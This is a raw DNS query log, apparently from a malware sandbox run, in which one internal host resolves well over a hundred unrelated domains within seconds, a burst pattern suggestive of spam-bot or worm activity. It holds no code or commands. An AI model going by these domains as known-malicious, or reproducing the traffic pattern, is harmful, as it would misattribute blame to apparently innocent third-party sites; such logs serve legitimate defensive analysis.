Mar 22, 2023 05:45:33.031749964 CET	192.168.2.5	8.8.8.8	0xed51	Standard query (0)	www.yumgiskor.kz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.078557968 CET	192.168.2.5	8.8.8.8	0x3cd9	Standard query (0)	www.11tochi.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.164690971 CET	192.168.2.5	8.8.8.8	0x536e	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.198507071 CET	192.168.2.5	8.8.8.8	0xdce2	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.201098919 CET	192.168.2.5	8.8.8.8	0xa5ff	Standard query (0)	gbmfg.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.235755920 CET	192.168.2.5	8.8.8.8	0x88cf	Standard query (0)	oaith.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.274749994 CET	192.168.2.5	8.8.8.8	0xbe2	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.279552937 CET	192.168.2.5	8.8.8.8	0x5150	Standard query (0)	eos-i.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.282605886 CET	192.168.2.5	8.8.8.8	0x6860	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.320893049 CET	192.168.2.5	8.8.8.8	0x9761	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.329816103 CET	192.168.2.5	8.8.8.8	0x8450	Standard query (0)	doggybag.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.494019985 CET	192.168.2.5	8.8.8.8	0x23c5	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.611087084 CET	192.168.2.5	8.8.8.8	0xc599	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.692714930 CET	192.168.2.5	8.8.8.8	0xd4f7	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.706439018 CET	192.168.2.5	8.8.8.8	0xc2e0	Standard query (0)	nlcv.bas.bg	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.766434908 CET	192.168.2.5	8.8.8.8	0xf0f8	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.781100988 CET	192.168.2.5	8.8.8.8	0x62d3	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.783550978 CET	192.168.2.5	8.8.8.8	0x92a2	Standard query (0)	xinhui.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.798130035 CET	192.168.2.5	8.8.8.8	0xd789	Standard query (0)	from30ty.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.944380999 CET	192.168.2.5	8.8.8.8	0xf9bc	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:33.982105970 CET	192.168.2.5	8.8.8.8	0x9891	Standard query (0)	www.pb-games.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.099215984 CET	192.168.2.5	8.8.8.8	0x8b09	Standard query (0)	mail.airmail.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.144495964 CET	192.168.2.5	8.8.8.8	0xd37c	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.165009975 CET	192.168.2.5	8.8.8.8	0x6304	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.180617094 CET	192.168.2.5	8.8.8.8	0x6236	Standard query (0)	fdlymca.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.220434904 CET	192.168.2.5	8.8.8.8	0xff5	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.299288988 CET	192.168.2.5	8.8.8.8	0x46fb	Standard query (0)	listel.co.jp	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.320943117 CET	192.168.2.5	8.8.8.8	0x9761	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.501054049 CET	192.168.2.5	8.8.8.8	0x23c5	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.676415920 CET	192.168.2.5	8.8.8.8	0xf289	Standard query (0)	umcor.am	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.801141977 CET	192.168.2.5	8.8.8.8	0x5681	Standard query (0)	at-shun.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.817620039 CET	192.168.2.5	8.8.8.8	0x62d3	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.819971085 CET	192.168.2.5	8.8.8.8	0xe6f9	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.819971085 CET	192.168.2.5	8.8.8.8	0x6550	Standard query (0)	webways.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.819971085 CET	192.168.2.5	8.8.8.8	0x5202	Standard query (0)	fr-dat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.820710897 CET	192.168.2.5	8.8.8.8	0x7a9b	Standard query (0)	daytonir.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.821469069 CET	192.168.2.5	8.8.8.8	0x5ef6	Standard query (0)	bd-style.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.821949959 CET	192.168.2.5	8.8.8.8	0x646	Standard query (0)	vvsteknik.dk	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.822644949 CET	192.168.2.5	8.8.8.8	0x86dd	Standard query (0)	oh28ya.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.822747946 CET	192.168.2.5	8.8.8.8	0xb78e	Standard query (0)	slower.it	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.823185921 CET	192.168.2.5	8.8.8.8	0x1db	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.828934908 CET	192.168.2.5	8.8.8.8	0x6808	Standard query (0)	komie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.828934908 CET	192.168.2.5	8.8.8.8	0x45e0	Standard query (0)	www.sclover3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.833791018 CET	192.168.2.5	8.8.8.8	0x1e0e	Standard query (0)	jnf.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.833791971 CET	192.168.2.5	8.8.8.8	0xef98	Standard query (0)	kursavto.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.833791971 CET	192.168.2.5	8.8.8.8	0x5d8	Standard query (0)	cbras.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.834467888 CET	192.168.2.5	8.8.8.8	0xfeee	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.834888935 CET	192.168.2.5	8.8.8.8	0x7fe0	Standard query (0)	nolaoig.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.834888935 CET	192.168.2.5	8.8.8.8	0x1464	Standard query (0)	dspears.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.836137056 CET	192.168.2.5	8.8.8.8	0x6c2b	Standard query (0)	skypearl.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.836137056 CET	192.168.2.5	8.8.8.8	0x422f	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.836678982 CET	192.168.2.5	8.8.8.8	0x60f2	Standard query (0)	biurohera.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.837141037 CET	192.168.2.5	8.8.8.8	0x2901	Standard query (0)	fogra.com.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.837408066 CET	192.168.2.5	8.8.8.8	0x4fdc	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.838490009 CET	192.168.2.5	8.8.8.8	0xe35c	Standard query (0)	araax.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.839140892 CET	192.168.2.5	8.8.8.8	0xc65c	Standard query (0)	rast.se	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.839440107 CET	192.168.2.5	8.8.8.8	0x2cd6	Standard query (0)	agulatex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.843410969 CET	192.168.2.5	8.8.8.8	0xc85d	Standard query (0)	sledsport.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.845228910 CET	192.168.2.5	8.8.8.8	0xd1c8	Standard query (0)	shittas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.845834017 CET	192.168.2.5	8.8.8.8	0x13c0	Standard query (0)	siongann.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.847203016 CET	192.168.2.5	8.8.8.8	0x4402	Standard query (0)	oozkranj.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.847549915 CET	192.168.2.5	8.8.8.8	0x2c0f	Standard query (0)	amba-tc.si	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.848057985 CET	192.168.2.5	8.8.8.8	0x132c	Standard query (0)	gujarat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.848499060 CET	192.168.2.5	8.8.8.8	0x2973	Standard query (0)	shteeble.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.848853111 CET	192.168.2.5	8.8.8.8	0x1440	Standard query (0)	x96.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.848853111 CET	192.168.2.5	8.8.8.8	0x5652	Standard query (0)	doggybag.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.855211020 CET	192.168.2.5	8.8.8.8	0xb9b3	Standard query (0)	acraloc.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.855211020 CET	192.168.2.5	8.8.8.8	0x47e5	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.867373943 CET	192.168.2.5	8.8.8.8	0x11c4	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.869581938 CET	192.168.2.5	8.8.8.8	0x26bc	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.885443926 CET	192.168.2.5	8.8.8.8	0x4f21	Standard query (0)	shztm.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.885443926 CET	192.168.2.5	8.8.8.8	0xb9f4	Standard query (0)	kewlmail.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.885443926 CET	192.168.2.5	8.8.8.8	0xead2	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.886941910 CET	192.168.2.5	8.8.8.8	0x6302	Standard query (0)	vfcindia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.895035028 CET	192.168.2.5	8.8.8.8	0xc8f8	Standard query (0)	hchc.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.895035028 CET	192.168.2.5	8.8.8.8	0xe9af	Standard query (0)	k-nikko.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.898905039 CET	192.168.2.5	8.8.8.8	0x5029	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.903542995 CET	192.168.2.5	8.8.8.8	0xf3c7	Standard query (0)	tbvlugus.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.907082081 CET	192.168.2.5	8.8.8.8	0xba84	Standard query (0)	keio-web.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.907428026 CET	192.168.2.5	8.8.8.8	0x72f6	Standard query (0)	cutchie.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.908266068 CET	192.168.2.5	8.8.8.8	0x5d1f	Standard query (0)	agulatex.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.910569906 CET	192.168.2.5	8.8.8.8	0xcc5b	Standard query (0)	banvari.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.914202929 CET	192.168.2.5	8.8.8.8	0x5032	Standard query (0)	duiops.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.914202929 CET	192.168.2.5	8.8.8.8	0x88c9	Standard query (0)	isom.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.914202929 CET	192.168.2.5	8.8.8.8	0x6441	Standard query (0)	sjbmw.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.916127920 CET	192.168.2.5	8.8.8.8	0x5245	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.918325901 CET	192.168.2.5	8.8.8.8	0xece2	Standard query (0)	paraski.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.923856020 CET	192.168.2.5	8.8.8.8	0x868	Standard query (0)	popbook.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.926234961 CET	192.168.2.5	8.8.8.8	0x9f92	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.927265882 CET	192.168.2.5	8.8.8.8	0x1e0f	Standard query (0)	anduran.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.928086996 CET	192.168.2.5	8.8.8.8	0x470b	Standard query (0)	mijash3.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.928855896 CET	192.168.2.5	8.8.8.8	0x3af0	Standard query (0)	multip.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.929821968 CET	192.168.2.5	8.8.8.8	0xa2a2	Standard query (0)	ntc.edu.au	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.932347059 CET	192.168.2.5	8.8.8.8	0x7c5f	Standard query (0)	dayvo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.933690071 CET	192.168.2.5	8.8.8.8	0x3e65	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.934946060 CET	192.168.2.5	8.8.8.8	0x3de9	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.934946060 CET	192.168.2.5	8.8.8.8	0x9bb3	Standard query (0)	rtcasey.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.938205957 CET	192.168.2.5	8.8.8.8	0xf037	Standard query (0)	sidepath.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.940082073 CET	192.168.2.5	8.8.8.8	0xee97	Standard query (0)	floopis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.942151070 CET	192.168.2.5	8.8.8.8	0x6a2f	Standard query (0)	fdlymca.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.948165894 CET	192.168.2.5	8.8.8.8	0xab1	Standard query (0)	oozkranj.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.948779106 CET	192.168.2.5	8.8.8.8	0x7a77	Standard query (0)	shenhgts.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.951762915 CET	192.168.2.5	8.8.8.8	0x15cd	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.955415010 CET	192.168.2.5	8.8.8.8	0x769e	Standard query (0)	603888.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.978035927 CET	192.168.2.5	8.8.8.8	0x42ce	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.986767054 CET	192.168.2.5	8.8.8.8	0xf802	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.013051987 CET	192.168.2.5	8.8.8.8	0xc9d4	Standard query (0)	pccj.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.016689062 CET	192.168.2.5	8.8.8.8	0x2bde	Standard query (0)	bidroll.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.017985106 CET	192.168.2.5	8.8.8.8	0x4ff0	Standard query (0)	htsmx.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.026716948 CET	192.168.2.5	8.8.8.8	0x8dbf	Standard query (0)	touchfam.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.027831078 CET	192.168.2.5	8.8.8.8	0x8382	Standard query (0)	nettlinx.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.037944078 CET	192.168.2.5	8.8.8.8	0xe1cf	Standard query (0)	fundeo.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.041994095 CET	192.168.2.5	8.8.8.8	0x9c8c	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.044667006 CET	192.168.2.5	8.8.8.8	0x8b6d	Standard query (0)	cyclad.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.047122002 CET	192.168.2.5	8.8.8.8	0x220c	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.047461987 CET	192.168.2.5	8.8.8.8	0x3a2f	Standard query (0)	atbauk.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.050923109 CET	192.168.2.5	8.8.8.8	0xea9b	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.056227922 CET	192.168.2.5	8.8.8.8	0xe1c8	Standard query (0)	bggs.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.069330931 CET	192.168.2.5	8.8.8.8	0x6eb2	Standard query (0)	btsi.com.ph	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.071309090 CET	192.168.2.5	8.8.8.8	0xbad8	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.071743965 CET	192.168.2.5	8.8.8.8	0x29a8	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.073817968 CET	192.168.2.5	8.8.8.8	0x3820	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.081494093 CET	192.168.2.5	8.8.8.8	0x639b	Standard query (0)	aluminox.es	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.087701082 CET	192.168.2.5	8.8.8.8	0xa077	Standard query (0)	mcseurope.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.098370075 CET	192.168.2.5	8.8.8.8	0x2e76	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.098737955 CET	192.168.2.5	8.8.8.8	0x6233	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.099411011 CET	192.168.2.5	8.8.8.8	0xcb0a	Standard query (0)	cpwpb.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.101957083 CET	192.168.2.5	8.8.8.8	0x9e11	Standard query (0)	pro-fa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.105593920 CET	192.168.2.5	8.8.8.8	0xbd33	Standard query (0)	canasil.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.106812954 CET	192.168.2.5	8.8.8.8	0x8b91	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.120270967 CET	192.168.2.5	8.8.8.8	0x837a	Standard query (0)	mackusick.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.120728970 CET	192.168.2.5	8.8.8.8	0xaf30	Standard query (0)	adeesa.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.135005951 CET	192.168.2.5	8.8.8.8	0xa6c1	Standard query (0)	avse.hu	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.159696102 CET	192.168.2.5	8.8.8.8	0x4dce	Standard query (0)	nt-hat.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.167089939 CET	192.168.2.5	8.8.8.8	0xb023	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.182260036 CET	192.168.2.5	8.8.8.8	0x97e7	Standard query (0)	orbitgas.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.185806036 CET	192.168.2.5	8.8.8.8	0x2f2d	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.192183971 CET	192.168.2.5	8.8.8.8	0xafc1	Standard query (0)	avc.com.sa	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.202985048 CET	192.168.2.5	8.8.8.8	0xf7e1	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.209796906 CET	192.168.2.5	8.8.8.8	0x506d	Standard query (0)	sigtoa.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.216109991 CET	192.168.2.5	8.8.8.8	0xbb82	Standard query (0)	techtrans.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.224462986 CET	192.168.2.5	8.8.8.8	0x14e4	Standard query (0)	webways.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.229888916 CET	192.168.2.5	8.8.8.8	0x3d6	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.249727964 CET	192.168.2.5	8.8.8.8	0xfc30	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.250930071 CET	192.168.2.5	8.8.8.8	0x4596	Standard query (0)	cjcagent.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.252616882 CET	192.168.2.5	8.8.8.8	0x954a	Standard query (0)	hamaker.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.255961895 CET	192.168.2.5	8.8.8.8	0x8897	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.260788918 CET	192.168.2.5	8.8.8.8	0xd3aa	Standard query (0)	vonparis.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.267139912 CET	192.168.2.5	8.8.8.8	0x4dc7	Standard query (0)	aiolos-sa.gr	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.273154974 CET	192.168.2.5	8.8.8.8	0xca71	Standard query (0)	usadig.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.287349939 CET	192.168.2.5	8.8.8.8	0x45ee	Standard query (0)	tbvlugus.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.312335014 CET	192.168.2.5	8.8.8.8	0x8cd6	Standard query (0)	shenhgts.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.316471100 CET	192.168.2.5	8.8.8.8	0xa9b8	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.317120075 CET	192.168.2.5	8.8.8.8	0x9b	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.319825888 CET	192.168.2.5	8.8.8.8	0x6860	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.323159933 CET	192.168.2.5	8.8.8.8	0x9c27	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.333427906 CET	192.168.2.5	8.8.8.8	0x79aa	Standard query (0)	xsui.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.336477041 CET	192.168.2.5	8.8.8.8	0x77b2	Standard query (0)	iranytu.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.338973999 CET	192.168.2.5	8.8.8.8	0x7688	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.346738100 CET	192.168.2.5	8.8.8.8	0xe2f	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.347206116 CET	192.168.2.5	8.8.8.8	0x9746	Standard query (0)	clysma.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.350665092 CET	192.168.2.5	8.8.8.8	0x7420	Standard query (0)	willsub.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.353077888 CET	192.168.2.5	8.8.8.8	0x3b81	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.353334904 CET	192.168.2.5	8.8.8.8	0xc984	Standard query (0)	89gospel.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.355458975 CET	192.168.2.5	8.8.8.8	0xc21f	Standard query (0)	ifesnet.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.357654095 CET	192.168.2.5	8.8.8.8	0x9e2	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.365046978 CET	192.168.2.5	8.8.8.8	0xb18a	Standard query (0)	dbnet.at	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.376223087 CET	192.168.2.5	8.8.8.8	0x5736	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.389118910 CET	192.168.2.5	8.8.8.8	0x9761	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.407872915 CET	192.168.2.5	8.8.8.8	0x6028	Standard query (0)	websy.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.409598112 CET	192.168.2.5	8.8.8.8	0xdab1	Standard query (0)	ludea.cz	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.413794994 CET	192.168.2.5	8.8.8.8	0xfe09	Standard query (0)	cqdgroup.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.416843891 CET	192.168.2.5	8.8.8.8	0x33c	Standard query (0)	enguita.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.419262886 CET	192.168.2.5	8.8.8.8	0x4557	Standard query (0)	amele.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.420295954 CET	192.168.2.5	8.8.8.8	0xadee	Standard query (0)	onzcda.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.423223019 CET	192.168.2.5	8.8.8.8	0xd95	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.426182985 CET	192.168.2.5	8.8.8.8	0xfe8c	Standard query (0)	s5w.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.429609060 CET	192.168.2.5	8.8.8.8	0x7120	Standard query (0)	burstner.ru	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.430596113 CET	192.168.2.5	8.8.8.8	0xa390	Standard query (0)	insia.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.459402084 CET	192.168.2.5	8.8.8.8	0xe6b7	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.484592915 CET	192.168.2.5	8.8.8.8	0x2437	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.488373995 CET	192.168.2.5	8.8.8.8	0x83bf	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.508554935 CET	192.168.2.5	8.8.8.8	0x66a5	Standard query (0)	rappich.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.511784077 CET	192.168.2.5	8.8.8.8	0xed30	Standard query (0)	akdeniz.nl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.513123989 CET	192.168.2.5	8.8.8.8	0x6c77	Standard query (0)	wolffkran.de	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.515264988 CET	192.168.2.5	8.8.8.8	0xacd9	Standard query (0)	hbfuels.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.518863916 CET	192.168.2.5	8.8.8.8	0x4242	Standard query (0)	awfraser.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.523212910 CET	192.168.2.5	8.8.8.8	0xd080	Standard query (0)	madjek.com	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.526781082 CET	192.168.2.5	8.8.8.8	0xb2a4	Standard query (0)	ccrsi.org	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.528320074 CET	192.168.2.5	8.8.8.8	0x3b67	Standard query (0)	atis-sk.ca	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.529227018 CET	192.168.2.5	8.8.8.8	0xfc31	Standard query (0)	pleszew.policja.gov.pl	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.535679102 CET	192.168.2.5	8.8.8.8	0x3427	Standard query (0)	koz1.net	A (IP address)	IN (0x0001)	false
